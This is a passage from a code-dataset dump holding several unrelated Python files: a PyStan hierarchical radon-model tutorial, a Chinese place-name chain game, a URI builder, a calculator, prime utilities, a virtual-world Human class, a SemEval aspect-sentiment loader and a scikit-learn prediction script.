palette=\"muted\", color_codes=True)\n\n# Plot the orbital period with horizontal boxes\nplt.figure(figsize=(16, 6))\nsns.boxplot(data=a_sample, whis=np.inf, color=\"c\")\n\nvarying_intercept_fit.plot(pars=['sigma_a', 'b']);\n\nvarying_intercept_fit['b'].mean()\n\nxvals = np.arange(2)\nbp = varying_intercept_fit['a'].mean(axis=0)\nmp = varying_intercept_fit['b'].mean()\nfor bi in bp:\n plt.plot(xvals, mp*xvals + bi, 'bo-', alpha=0.4)\nplt.xlim(-0.1,1.1);\n\n#It is easy to show that the partial pooling model provides more objectively reasonable estimates than either the pooled or unpooled models, at least for counties with small sample sizes.\n\nfig, axes = plt.subplots(2, 4, figsize=(12, 6), sharey=True, sharex=True)\naxes = axes.ravel()\nfor i,c in enumerate(sample_counties):\n \n # Plot county data\n y = srrs_mn.log_radon[srrs_mn.county==c]\n x = srrs_mn.floor[srrs_mn.county==c]\n axes[i].scatter(x + np.random.randn(len(x))*0.01, y, alpha=0.4)\n \n # No pooling model\n m,b = unpooled_estimates[['floor', c]]\n \n xvals = np.linspace(-0.2, 1.2)\n # Unpooled estimate\n axes[i].plot(xvals, m*xvals+b)\n # Pooled estimate\n axes[i].plot(xvals, m0*xvals+b0, 'r--')\n # Partial pooling esimate\n axes[i].plot(xvals, mp*xvals+bp[county_lookup[c]], 'k:')\n axes[i].set_xticks([0,1])\n axes[i].set_xticklabels(['basement', 'floor'])\n axes[i].set_ylim(-1, 3)\n axes[i].set_title(c)\n if not i%2:\n axes[i].set_ylabel('log radon level')\n\n\n#Varying slope model\n\n#Alternatively, we can posit a model that allows the counties to vary according to how the location of measurement (basement or floor) influences the radon reading.\n#yi=α+βj[i]xi+ϵi\n\nvarying_slope = \"\"\"\ndata {\n int J; \n int N; \n int county[N];\n vector[N] x;\n vector[N] y;\n} \nparameters {\n real a;\n vector[J] b;\n real mu_b;\n real sigma_b;\n real sigma_y;\n} \ntransformed parameters {\n\n vector[N] y_hat;\n\n for (i in 1:N)\n y_hat[i] = a + x[i] * b[county[i]];\n}\nmodel {\n sigma_b ~ uniform(0, 100);\n b ~ normal (mu_b, sigma_b);\n\n a ~ normal (0, 1);\n\n sigma_y ~ uniform(0, 100);\n y ~ normal(y_hat, sigma_y);\n}\n\"\"\"\n\nvarying_slope_data = {'N': len(log_radon),\n 'J': len(n_county),\n 'county': county+1, # Stan counts starting at 1\n 'x': floor_measure,\n 'y': log_radon}\n\nvarying_slope_fit = pystan.stan(model_code=varying_slope, data=varying_slope_data, iter=1000, chains=2)\n\nb_sample = pd.DataFrame(varying_slope_fit['b'])\n\n# Plot the orbital period with horizontal boxes\nplt.figure(figsize=(16, 6))\nsns.boxplot(data=b_sample, whis=np.inf, color=\"c\")\n\nxvals = np.arange(2)\nb = varying_slope_fit['a'].mean()\nm = varying_slope_fit['b'].mean(axis=0)\nfor mi in m:\n plt.plot(xvals, mi*xvals + b, 'bo-', alpha=0.4)\nplt.xlim(-0.2, 1.2);\n\n#Varying intercept and slope model\n\n#The most general model allows both the intercept and slope to vary by county:\n#yi=αj[i]+βj[i]xi+ϵi\n\nvarying_intercept_slope = \"\"\"\ndata {\n int N;\n int J;\n vector[N] y;\n vector[N] x;\n int county[N];\n}\nparameters {\n real sigma;\n real sigma_a;\n real sigma_b;\n vector[J] a;\n vector[J] b;\n real mu_a;\n real mu_b;\n}\n\nmodel {\n mu_a ~ normal(0, 100);\n mu_b ~ normal(0, 100);\n\n a ~ normal(mu_a, sigma_a);\n b ~ normal(mu_b, sigma_b);\n y ~ normal(a[county] + b[county].*x, sigma);\n}\n\"\"\"\n\nvarying_intercept_slope_data = {'N': len(log_radon),\n 'J': len(n_county),\n 'county': county+1, # Stan counts starting at 1\n 'x': floor_measure,\n 'y': log_radon}\n\nvarying_intercept_slope_fit = pystan.stan(model_code=varying_intercept_slope, \n data=varying_intercept_slope_data, \n iter=1000, chains=2)\n\nxvals = np.arange(2)\nb = varying_intercept_slope_fit['a'].mean(axis=0)\nm = varying_intercept_slope_fit['b'].mean(axis=0)\nfor bi,mi in zip(b,m):\n plt.plot(xvals, mi*xvals + bi, 'bo-', alpha=0.4)\nplt.xlim(-0.1, 1.1);\n\n#Adding group-level predictors\n\n#A primary strength of multilevel models is the ability to handle predictors on multiple levels simultaneously. If we consider the varying-intercepts model above:\n#yi=αj[i]+βxi+ϵi\n\n#we may, instead of a simple random effect to describe variation in the expected radon value, specify another regression model with a county-level covariate. Here, we use the county uranium reading uj\n\n#, which is thought to be related to radon levels:\n#αj=γ0+γ1uj+ζj\n#ζj∼N(0,σ2α)\n\n#Thus, we are now incorporating a house-level predictor (floor or basement) as well as a county-level predictor (uranium).\n\n#Note that the model has both indicator variables for each county, plus a county-level covariate. In classical regression, this would result in collinearity. In a multilevel model, the partial pooling of the intercepts towards the expected value of the group-level linear model avoids this.\n\n#Group-level predictors also serve to reduce group-level variation σα\n#. An important implication of this is that the group-level estimate induces stronger pooling.\n\nhierarchical_intercept = \"\"\"\ndata {\n int J; \n int N; \n int county[N];\n vector[N] u;\n vector[N] x;\n vector[N] y;\n} \nparameters {\n vector[J] a;\n vector[2] b;\n real mu_a;\n real sigma_a;\n real sigma_y;\n} \ntransformed parameters {\n vector[N] y_hat;\n vector[N] m;\n\n for (i in 1:N) {\n m[i] = a[county[i]] + u[i] * b[1];\n y_hat[i] = m[i] + x[i] * b[2];\n }\n}\nmodel {\n mu_a ~ normal(0, 1);\n a ~ normal(mu_a, sigma_a);\n b ~ normal(0, 1);\n y ~ normal(y_hat, sigma_y);\n}\n\"\"\"\n\nhierarchical_intercept_data = {'N': len(log_radon),\n 'J': len(n_county),\n 'county': county+1, # Stan counts starting at 1\n 'u': u,\n 'x': floor_measure,\n 'y': log_radon}\n\nhierarchical_intercept_fit = pystan.stan(model_code=hierarchical_intercept, data=hierarchical_intercept_data, \n iter=1000, chains=2)\n\n#a_means = M_hierarchical.a.trace().mean(axis=0)\nm_means = hierarchical_intercept_fit['m'].mean(axis=0)\nplt.scatter(u, m_means)\ng0 = hierarchical_intercept_fit['mu_a'].mean()\ng1 = hierarchical_intercept_fit['b'][:, 0].mean()\nxvals = np.linspace(-1, 0.8)\nplt.plot(xvals, g0+g1*xvals, 'k--')\nplt.xlim(-1, 0.8)\n\nm_se = hierarchical_intercept_fit['m'].std(axis=0)\nfor ui, m, se in zip(u, m_means, m_se):\n plt.plot([ui,ui], [m-se, m+se], 'b-')\nplt.xlabel('County-level uranium'); plt.ylabel('Intercept estimate')\n\n\n\n#The standard errors on the intercepts are narrower than for the partial-pooling model without a county-level covariate.\n#Correlations among levels\n\n#In some instances, having predictors at multiple levels can reveal correlation between individual-level variables and group residuals. We can account for this by including the average of the individual predictors as a covariate in the model for the group intercept.\n#αj=γ0+γ1uj+γ2x¯+ζj\n\n#These are broadly referred to as contextual effects.\n\n# Create new variable for mean of floor across counties\nxbar = srrs_mn.groupby('county')['floor'].mean().rename(county_lookup).values\n\nx_mean = xbar[county]\n\ncontextual_effect = \"\"\"\ndata {\n int J; \n int N; \n int county[N];\n vector[N] u;\n vector[N] x;\n vector[N] x_mean;\n vector[N] y;\n} \nparameters {\n vector[J] a;\n vector[3] b;\n real mu_a;\n real sigma_a;\n real sigma_y;\n} \ntransformed parameters {\n vector[N] y_hat;\n\n for (i in 1:N)\n y_hat[i] = a[county[i]] + u[i]*b[1] + x[i]*b[2] + x_mean[i]*b[3];\n}\nmodel {\n mu_a ~ normal(0, 1);\n a ~ normal(mu_a, sigma_a);\n b ~ normal(0, 1);\n y ~ normal(y_hat, sigma_y);\n}\n\"\"\"\n\ncontextual_effect_data = {'N': len(log_radon),\n 'J': len(n_county),\n 'county': county+1, # Stan counts starting at 1\n 'u': u,\n 'x_mean': x_mean,\n 'x': floor_measure,\n 'y': log_radon}\n\ncontextual_effect_fit = pystan.stan(model_code=contextual_effect, data=contextual_effect_data, \n iter=1000, chains=2)\n\ncontextual_effect_fit['b'].mean(0)\n\ncontextual_effect_fit.plot('b');\n\n#So, we might infer from this that counties with higher proportions of houses without basements tend to have higher baseline levels of radon. Perhaps this is related to the soil type, which in turn might influence what type of structures are built.\n\n\n#Prediction\n\n#Gelman (2006) used cross-validation tests to check the prediction error of the unpooled, pooled, and partially-pooled models\n\n#root mean squared cross-validation prediction errors:\n\n# unpooled = 0.86\n# pooled = 0.84\n# multilevel = 0.79\n\n#There are two types of prediction that can be made in a multilevel model:\n\n# a new individual within an existing group\n# a new individual within a new group\n\n#For example, if we wanted to make a prediction for a new house with no basement in St. Louis county, we just need to sample from the radon model with the appropriate intercept.\n\ncounty_lookup['ST LOUIS']\n\n#That is,\n#ỹ i∼N(α69+β(xi=1),σ2y)\n\n#This is simply a matter of adding a single additional line in PyStan:\n\ncontextual_pred = \"\"\"\ndata {\n int J; \n int N; \n int stl;\n real u_stl;\n real xbar_stl;\n int county[N];\n vector[N] u;\n vector[N] x;\n vector[N] x_mean;\n vector[N] y;\n} \nparameters {\n vector[J] a;\n vector[3] b;\n real mu_a;\n real sigma_a;\n real sigma_y;\n} \ntransformed parameters {\n vector[N] y_hat;\n real stl_mu;\n\n for (i in 1:N)\n y_hat[i] = a[county[i]] + u[i] * b[1] + x[i] * b[2] + x_mean[i] * b[3];\n \n stl_mu = a[stl+1] + u_stl * b[1] + b[2] + xbar_stl * b[3];\n }\nmodel {\n mu_a ~ normal(0, 1);\n a ~ normal(mu_a, sigma_a);\n b ~ normal(0, 1);\n y ~ normal(y_hat, sigma_y);\n}\ngenerated quantities {\n real y_stl;\n \n y_stl = normal_rng(stl_mu, sigma_y);\n}\n\"\"\"\n\ncontextual_pred_data = {'N': len(log_radon),\n 'J': len(n_county),\n 'county': county+1, # Stan counts starting at 1\n 'u': u,\n 'x_mean': x_mean,\n 'x': floor_measure,\n 'y': log_radon,\n 'stl': 69,\n 'u_stl': np.log(cty_mn[cty_mn.cty=='STLOUIS'].Uppm.values)[0],\n 'xbar_stl': xbar[69]}\n\ncontextual_pred_fit = pystan.stan(model_code=contextual_pred, data=contextual_pred_data, \n iter=1000, chains=2)\n\ncontextual_pred_fit.plot('y_stl');\n\n\n#TODO: How would we make a prediction from a new county (e.g. one not included in this dataset)?\n\n\n#Change the first set of models:\n\n#TODO: Make an indicator for the observation being of white race. Allow the intercepts of the logit to vary by race. Place priors on the mean and standard deviation of the random intercepts.\n\n\n#TODO: Allow the economic slopes and intercept to vary by race\n\n\n","sub_path":"in-classMaterial/day11/exampleStan.py","file_name":"exampleStan.py","file_ext":"py","file_size_in_byte":28346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"337565287","text":"import requests\r\nimport re\r\nimport pypinyin as py\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\n\r\nurl='http://www.360doc.com/content/16/0419/10/877149_551849520.shtml'\r\nr = requests.get(url)\r\nr.encoding = 'utf-8'\r\n\r\ns_name = re.findall('[\\u4e00-\\u9fa5]{1,3}市', r.text)\r\ns_name = list(set(s_name))\r\nshi = []\r\nfor i in s_name:\r\n shi.append(i[:-1])\r\nshi_removed = shi.remove('中国省')\r\nshi_removed = shi.remove('国各省')\r\nshi_removed = shi.remove('县级')\r\nshi_removed = shi.remove('辖地级')\r\nshi_removed = shi.remove('县个级')\r\nshi_removed = shi.remove('全国省')\r\n\r\nx_name = re.findall('[\\u4e00-\\u9fa5]{1,3}县', r.text)\r\nx_name = list(set(x_name))\r\nxian = []\r\nfor i in x_name:\r\n\txian.append(i[:-1])\r\n\r\nq_name = re.findall('[\\u4e00-\\u9fa5]{2,3}区', r.text)\r\nq_name = list(set(q_name))\r\nqu = []\r\nfor i in q_name:\r\n\tqu.append(i[:-1])\r\nqu.remove('国地名')\r\nqu.remove('各省市')\r\nqu.remove('个市辖')\r\nqu.remove('族自治')\r\nqu.remove('省行政')\r\nqu.remove('省市县')\r\nqu.remove('个地')\r\nqu.remove('尔自治')\r\nqu.remove('别行政')\r\nqu.remove('藏自治')\r\nqu.remove('古自治')\r\nqu.remove('万山特')\r\nqu.remove('六枝特')\r\n\r\nqu.append('香港')\r\nqu.append('西藏')\r\nqu.append('澳门')\r\nqu.append('新疆')\r\nqu.append('宁夏')\r\nqu.append('广西')\r\n\r\nall_name = list(set(shi+xian+qu))\r\nall_name = np.reshape(all_name,-1)\r\n\r\nall_pinyin = py.pinyin(all_name)\r\nall_pinyin = np.reshape(all_pinyin,-1)\r\n\r\nword_length = []\r\nfor i in all_name:\r\n word_length.append(len(i))\r\nword_length = np.array(word_length)\r\n\r\ncount = 0\r\nend_position = []\r\nfor i in word_length:\r\n count+=i\r\n end_position.append(count)\r\nend_position = np.array(end_position)\r\n\r\nfront_position = [m - n + 1 for m,n in zip(end_position,word_length)] \r\nfront_position = np.array(front_position)\r\n\r\nfront_pinyin = []\r\nfor i in front_position:\r\n front_pinyin.append(all_pinyin[i - 1])\r\nfront_pinyin = np.reshape(front_pinyin,-1)\r\n\r\n\r\nend_pinyin = []\r\nfor i in end_position:\r\n end_pinyin.append(all_pinyin[i - 1])\r\nend_pinyin = np.reshape(end_pinyin,-1)\r\n\r\n\r\ndf = pd.DataFrame(all_name,np.arange(len(all_name)))\r\n\r\ndf[1] = front_pinyin\r\ndf[2] = end_pinyin\r\ndf.columns = [\"地名\",\"头拼音\",\"尾拼音\"]\r\n\r\nplace_list = df['地名'].tolist()\r\nhead_pinyin_list = df['头拼音'].tolist()\r\nend_pinyin_list = df['尾拼音'].tolist()\r\n\r\n\r\nget_name = input(\"请输入地名(比如北京):\")\r\nwhile get_name:\r\n if get_name == 'QUIT':\r\n exit()\r\n else:\r\n if get_name in place_list:\r\n print(\"存在这个地名\\n\")\r\n if end_pinyin_list[place_list.index(get_name)] in head_pinyin_list:\r\n print('并且存在后继地名,后继城市有如下:\\n')\r\n place_count = 0\r\n for i in place_list:\r\n if end_pinyin_list[place_list.index(get_name)] == head_pinyin_list[place_list.index(i)]:\r\n place_count+=1\r\n print(place_count,i)\r\n print('选择一个地名来继续地名接龙,输入其中一个可能的地名:')\r\n get_name = input('哪一个地名你选择?退出请输入QUIT。')\r\n else:\r\n print('但是不存在后继地名,请换一个地名重新开始。')\r\n get_name = input()\r\n else:\r\n print(\"不存在这个地名\")\r\n print('但是不存在后继地名,请换一个地名重新开始。')\r\n get_name = input()\r\n\r\n","sub_path":"names_in_chain.py","file_name":"names_in_chain.py","file_ext":"py","file_size_in_byte":3494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"149938408","text":"#\n# Build URIs.\n#\n# Author: Max Kellermann \n#\n\nfrom urllib.parse import quote\n\ndef absolute_uri(request, scheme=None, host=None, uri=None, query_string=None,\n param=None):\n \"\"\"Returns the absolute URI of this request. You may override\n some of the attributes.\"\"\"\n\n if scheme is None: scheme = \"http\"\n if host is None:\n host = request.host\n if host is None: host = \"localhost\"\n if uri is None:\n uri = request.raw_uri\n if uri is None: uri = \"/\"\n x = scheme + \"://\" + host + uri\n if request.args is not None:\n x += \";\" + request.args\n\n if param is not None:\n if request.args is not None:\n x += \"&\"\n else:\n x += \";\"\n x += \"translate=\" + quote(param)\n\n if query_string is None:\n query_string = request.query_string\n if query_string is not None:\n x += \"?\" + query_string\n return x\n","sub_path":"python/beng_proxy/translation/uri.py","file_name":"uri.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"463393310","text":"from __future__ import division\r\nimport numpy as np\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.semi_supervised import LabelSpreading\r\nfrom sklearn.linear_model import Perceptron\r\nimport argparse\r\n\r\n\r\n \r\n# Load your classification data here\r\nX = []\r\nXtest=[]\r\ny = []\r\nparser=argparse.ArgumentParser()\r\nparser.add_argument(\"sampleTestFeatureFile\", type=str)\r\nparser.add_argument(\"sampleTrainingFeatureFile\", type=str)\r\nparser.add_argument(\"sampleTrainingOutcomeFile\", type=str)\r\nparser.add_argument(\"logitOutputFile\", type=str)\r\nparser.add_argument(\"semiSupOutputFile\", type=str)\r\nparser.add_argument(\"neuroNetOutputFile\", type=str)\r\nargs = parser.parse_args()\r\n\r\nfx=open(args.sampleTrainingFeatureFile,'r')\r\nfor line in fx:\r\n #X.append(line.strip().split(','))\r\n a=[]\r\n a.append(line.strip().split('\\t'))\r\n i=0;\r\n while i<16:\r\n X.append(float(a[0][i]))\r\n i=i+1\r\n \r\n #X.append(tuple(float(a[0][0]),float(a[0][1])??not work\r\n\r\nX=np.asarray(X)\r\nXLength=len(X)\r\n\r\nX=X.reshape(XLength//16,16)\r\nfxt=open(args.sampleTestFeatureFile,'r')\r\nfor line in fxt:\r\n #X.append(line.strip().split(','))\r\n a=[]\r\n a.append(line.strip().split('\\t'))\r\n i=0;\r\n while i<16:\r\n Xtest.append(float(a[0][i]))\r\n i=i+1\r\n \r\n #X.append(tuple(float(a[0][0]),float(a[0][1])??not work\r\n\r\nXtest=np.asarray(Xtest)\r\nXtestLength=len(Xtest)\r\n\r\nXtest=Xtest.reshape(XtestLength//16,16)\r\n \r\n \r\n\r\nfy=open(args.sampleTrainingOutcomeFile,'r')\r\nfor line in fy:\r\n\ty.append(float(line))\r\n \r\ny=np.asarray(y)\r\n\r\n#logistic regression\r\nlog_reg = LogisticRegression(C=10**10)\r\nlog_reg.fit(X, y)\r\ny_hat = log_reg.predict(Xtest)\r\nout = open(args.logitOutputFile,'w')\r\nout.write(','.join(map(str,y_hat)))\r\nout.close()\r\n#semi-supervised learning LabelSpreading\r\n#choose K = 5 alpha= 0.8 \r\nclf = LabelSpreading(kernel='knn',n_neighbors=3,alpha=0.99999,n_jobs=15)\r\nXin=np.concatenate((X,Xtest),axis=0)\r\nlenXt=len(Xtest)\r\nlabels=np.empty(lenXt)\r\nlabels.fill(-1)\r\nyin=np.concatenate((y,labels),axis=0)\r\nclf.fit(Xin,yin)\r\ny_hat = clf.predict(Xtest)\r\nout = open(args.semiSupOutputFile,'w')\r\nout.write(','.join(map(str,y_hat)))\r\nout.close()\r\n\r\n#neuroNet work perceptron\r\n#choose n_iter = 60 \r\nclf = Perceptron(n_iter=5,random_state=0,n_jobs=20)\r\nclf.fit(X,y)\r\ny_hat = clf.predict(Xtest)\r\nout = open(args.neuroNetOutputFile,'w')\r\nout.write(','.join(map(str,y_hat)))\r\nout.close()\r\n","sub_path":"bin/predict2.py","file_name":"predict2.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"110194740","text":"# @Time : 2019/4/7 15:23\n# @Author : Xu Huipeng\n# @Blog : https://brycexxx.github.io/\n\nfrom typing import Tuple\n\n\ndef calculate(s: str) -> int:\n def get_digits(i: int, step: int) -> Tuple[int, int]:\n e = i + step\n while e < len(s) and s[e].isdigit():\n e += 1\n return int(s[i + step - 1:e]), e\n\n stack = ['+']\n i = 0\n # 去掉空格\n s = ''.join([elem for elem in s if elem != ' '])\n while i < len(s):\n if s[i] == '*':\n num1 = int(stack.pop())\n num2, i = get_digits(i, 2)\n stack.append(num1 * num2)\n elif s[i] == '/':\n dividend = int(stack.pop())\n divisor, i = get_digits(i, 2)\n stack.append(dividend // divisor)\n elif s[i].isdigit():\n digits, i = get_digits(i, 1)\n stack.append(digits)\n else:\n stack.append(s[i])\n i += 1\n ret = j = 0\n while j < len(stack):\n if stack[j] == '+':\n ret += int(stack[j + 1])\n elif stack[j] == '-':\n ret -= int(stack[j + 1])\n j += 2\n return ret\n\n\ndef calculate1(s: str) -> int:\n # 为了将最后一部分计算完成\n s += '+0'\n stack, num, preOp = [], 0, \"+\"\n for i in range(len(s)):\n if s[i].isdigit():\n num = num * 10 + int(s[i])\n elif not s[i].isspace():\n if preOp == \"-\":\n stack.append(-num)\n elif preOp == \"+\":\n stack.append(num)\n elif preOp == \"*\":\n stack.append(stack.pop() * num)\n else:\n stack.append(stack.pop() // num)\n preOp, num = s[i], 0\n return sum(stack)\n\n\nif __name__ == \"__main__\":\n s = \" 100*2 + 1 / 1 * 12 / 7\"\n print(calculate1(s))\n","sub_path":"calculate.py","file_name":"calculate.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"71401505","text":"# Utilities file for stuff like:\n# Finding Primes up to n\n# Getting all factors of n\n\nimport numpy as np\nimport random\nimport math\n\n# Get all primes up to n, inclusive\ndef getPrimeArr(n):\n\n # Sieve of Eratosthenes\n numArr =[2,3]\n for num in range(5, n+1, 2):\n numArr.append(num)\n print(\"Sieve generated.\")\n # Ticker\n sieveSize = len(numArr)\n print(\"Sieve size :\"),\n print(sieveSize)\n\n # Generate the non-primes\n index = 1\n num = numArr[index]\n while num != numArr[-1]:\n\n # Ticker\n if len(numArr) < sieveSize // 2:\n sieveSize = len(numArr)\n print(\"Sieve has been reduced by half to\"),\n print(sieveSize)\n\n for j in range(num**2, n+1, num * 2):\n if j in numArr:\n numArr.remove(j)\n index += 1\n num = numArr[index]\n\n print(len(numArr)),\n print(\"primes generated.\")\n return numArr\n\n# Update a prime array up to n, inclusive\ndef updatePrimeArr(n, primeArr):\n for x in xrange(primeArr[-1], n+1):\n for prime in primeArr:\n if x % prime == 0:\n break\n elif prime == primeArr[-1] and\\\n x % prime != 0:\n primeArr.append(x)\n\n return primeArr\n\n# Get all divisors of n (non-prime)\ndef getDivs(n):\n\n maxF = n # Maximum factor, stopping condition\n output = [1,n]\n\n for x in xrange(2, n // 2):\n if x + 1 == maxF:\n break\n if n % x == 0:\n output.append(x)\n output.append(n / x)\n\n maxF = n / x\n\n output = sorted(list(set(output)))\n return output\n\n# Return a list of permutations of a list\ndef permute(arr):\n # Recursive? Recursive.\n # Base case\n if len(arr) <= 1:\n return [arr]\n\n perms = []\n for elem in arr:\n reducedArr = list(arr)\n reducedArr.remove(elem)\n\n for perm in permute(reducedArr):\n perms.append([str(elem)] + perm)\n\n return perms\n\n# Get all prime factors.\ndef getPrimeFactors(n, primeArr=None):\n # Takes prime array to reduce compute.\n if primeArr is None:\n primeArr = getPrimeArr(n)\n\n if n in primeArr:\n return [n]\n\n index = 0\n output = []\n while primeArr[index] <= n:\n if n % primeArr[index] == 0:\n output.append(primeArr[index])\n n /= primeArr[index]\n else:\n index += 1\n return output\n\nif __name__ == \"__main__\":\n primeArr = getPrimeArr(25)\n print(\"Primes up to 25 : \"),\n print(primeArr)\n\n primeArr = updatePrimeArr(50, primeArr)\n print(\"Primes up to 25, updated to 50 : \"),\n print(primeArr)\n\n factors = getDivs(24)\n print(\"Factors of 24 : \"),\n print(factors)\n\n primefacs = getPrimeFactors(20)\n print(\"Primes factors of 20 : \"),\n print(primefacs)\n\n","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"39311922","text":"from Animals.Animal import Animal\nimport time\n#from manager.World import World\nclass Human(Animal):\n limitTarczaAlzura = 5\n def __init__(self , xx , yy , ref):\n self.wasMove = False\n self._tarczaAlzura = False\n self._roundsActivate = 0\n self._roundsDeactivate = Human.limitTarczaAlzura\n super(Human , self).__init__(5 , 4 , xx , yy , \"Czlowiek\" , ref)\n self._reference.getRoot().bind('', self.__onArrowUpPress)\n self._reference.getRoot().bind('', self.__onArrowDownPress)\n self._reference.getRoot().bind('', self.__onArrowRightPress)\n self._reference.getRoot().bind('', self.__onArrowLeftPress)\n self._reference.getRoot().bind('', self.__onKeyPress)\n def action(self):\n self._reference.drawComment(\"Ruch czlowieka\")\n if self._roundsActivate == 0:\n self._tarczaAlzura = False\n if self._tarczaAlzura == True:\n self._roundsActivate = self._roundsActivate - 1\n else:\n self._roundsDeactivate = self._roundsDeactivate + 1\n #osluga strzalek do czlowieka\n self.wasMove = False\n self._savePrevXY()\n time.sleep(2)\n def collision(self):\n if self._tarczaAlzura == True:\n self._reference.drawComment(\"Tarcza Alzura aktywna \" + str(Human.limitTarczaAlzura - self._roundsActivate) + \" rund pozostalo \" )\n self.doOnlyAction()\n else:\n return super(Human, self).collision()\n \n def __onArrowUpPress(self , event):\n if self._y - 1 >=0 and self.wasMove == False:\n self.wasMove = True\n self._y = self._y - 1\n self.__onArrowPress()\n \n def __onArrowDownPress(self , event):\n if self._y + 1 < self._reference.sizeWorld and self.wasMove == False:\n self.wasMove = True\n self._y = self._y + 1\n self.__onArrowPress()\n def __onArrowRightPress(self , event):\n if self._x + 1 < self._reference.sizeWorld and self.wasMove == False:\n self.wasMove = True\n self._x = self._x + 1\n self.__onArrowPress()\n def __onArrowLeftPress(self , event):\n if self._x - 1 >= 0 and self.wasMove == False:\n self.wasMove = True\n self._x = self._x - 1\n self.__onArrowPress()\n def __onArrowPress(self):\n self._reference.getDrawing().create_rectangle(self._reference.dimensionField*self._prevX, self._reference.dimensionField*self._prevY, self._reference.dimensionField*(self._prevX+1), self._reference.dimensionField*(self._prevY+1), fill=\"gray\" , outline=\"gray\")\n self.draw()\n self._reference.getDrawing().pack()\n def __onKeyPress(self , event):\n if event.char=='s' and self._tarczaAlzura == False and self._roundsDeactivate>=Human.limitTarczaAlzura:\n self._tarczaAlzura = True\n self._roundsActivate = Human.limitTarczaAlzura\n self._roundsDeactivate = 0\n self._reference.drawComment(\"Tarcza Alzura aktywowana\")\n\n def getWasMove(self):\n return self.wasMove\n def doOnlyAction(self): # wywowalnie z tarczy alzura\n self._reference.getDrawing.delete(\"all\")\n\n amount = len(self._reference.getOrganisms())\n for i in range(0 , amount):\n element = self._organisms[i]\n if self._x == self._reference.getOrganismX(i) and self._y == self._reference.getOrganismY(i):\n element.action()\n element.draw()\n self._drawing.pack()\n\n","sub_path":"sem2/python/wirtualWorld/Animals/Human.py","file_name":"Human.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"196913912","text":"import os\nimport csv\nimport numpy as np\n\nfrom tqdm import tqdm\n\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split\nfrom xml.etree import ElementTree as ET\nfrom nltk import word_tokenize\n\nseed = 3535999445\n\n\n#\n# def _rocstories(path):\n# with open(path, encoding='utf_8') as f:\n# f = csv.reader(f)\n# st = []\n# ct1 = []\n# ct2 = []\n# y = []\n# for i, line in enumerate(tqdm(list(f), ncols=80, leave=False)):\n# if i > 0:\n# s = ' '.join(line[1:5])\n# c1 = line[5]\n# c2 = line[6]\n# st.append(s)\n# ct1.append(c1)\n# ct2.append(c2)\n# y.append(int(line[-1]) - 1)\n# return st, ct1, ct2, y\n#\n#\n# def rocstories(data_dir, n_train=1497, n_valid=374):\n# storys, comps1, comps2, ys = _rocstories(\n# os.path.join(data_dir, 'cloze_test_val__spring2016 - cloze_test_ALL_val.csv'))\n# teX1, teX2, teX3, _ = _rocstories(os.path.join(data_dir, 'cloze_test_test__spring2016 - cloze_test_ALL_test.csv'))\n# tr_storys, va_storys, tr_comps1, va_comps1, tr_comps2, va_comps2, tr_ys, va_ys = train_test_split(storys, comps1,\n# comps2, ys,\n# test_size=n_valid,\n# random_state=seed)\n# trX1, trX2, trX3 = [], [], []\n# trY = []\n# for s, c1, c2, y in zip(tr_storys, tr_comps1, tr_comps2, tr_ys):\n# trX1.append(s)\n# trX2.append(c1)\n# trX3.append(c2)\n# trY.append(y)\n#\n# vaX1, vaX2, vaX3 = [], [], []\n# vaY = []\n# for s, c1, c2, y in zip(va_storys, va_comps1, va_comps2, va_ys):\n# vaX1.append(s)\n# vaX2.append(c1)\n# vaX3.append(c2)\n# vaY.append(y)\n# trY = np.asarray(trY, dtype=np.int32)\n# vaY = np.asarray(vaY, dtype=np.int32)\n# return (trX1, trX2, trX3, trY), (vaX1, vaX2, vaX3, vaY), (teX1, teX2, teX3)\n\n\ndef _semeval(fname):\n '''\n read aspect term data from xml file\n :param fname:\n :param wordcounter:\n :param targetcounter:\n :return:\n '''\n print('reading aspect term from {}'.format(fname))\n dic = {'positive': 2, 'neutral': 1, 'negative': 0}\n tree = ET.parse(fname)\n root = tree.getroot()\n bad_sent = 0\n sent_list = []\n aspect_list = []\n label_list = []\n for sentence in tqdm(root.findall('sentence')):\n try:\n txt = sentence.find('text').text.lower().rstrip()\n words = word_tokenize(txt)\n aspects = sentence.find('aspectTerms')\n for aspect in aspects.findall('aspectTerm'):\n a = aspect.get('term').lower().strip()\n # if '/' in a:\n # a = a.split('/')[-1]\n p = aspect.get('polarity')\n if p == 'conflict':\n continue\n p = dic[p]\n sent_list.append(txt)\n aspect_list.append(a)\n label_list.append(p)\n except:\n bad_sent += 1\n print('bad sent %d, total count %d' % (bad_sent, len(sent_list)))\n return sent_list, aspect_list, label_list\n\n\ndef semeval(data_dir):\n # sents, aspects, labels = _semeval(os.path.join(data_dir, 'Laptops_Train_v2.xml'))\n sents, aspects, labels = _semeval(os.path.join(data_dir, 'Restaurants_Train_v2.xml'))\n # va_sents, va_aspects, va_labels = _semeval(os.path.join(data_dir, 'Laptops_Test_Gold.xml'))\n va_sents, va_aspects, va_labels = _semeval(os.path.join(data_dir, 'Restaurants_Test_Gold.xml'))\n return (sents, aspects, labels), (va_sents, va_aspects, va_labels)\n","sub_path":"transformer_sep/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":3893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"304582829","text":"# coding: utf-8\n# Copyright (c) 2014 Valentin Novikov \n#\n# Tested on Ubuntu Server 14.04 (x64)\n\nimport os\nfrom fabric.api import 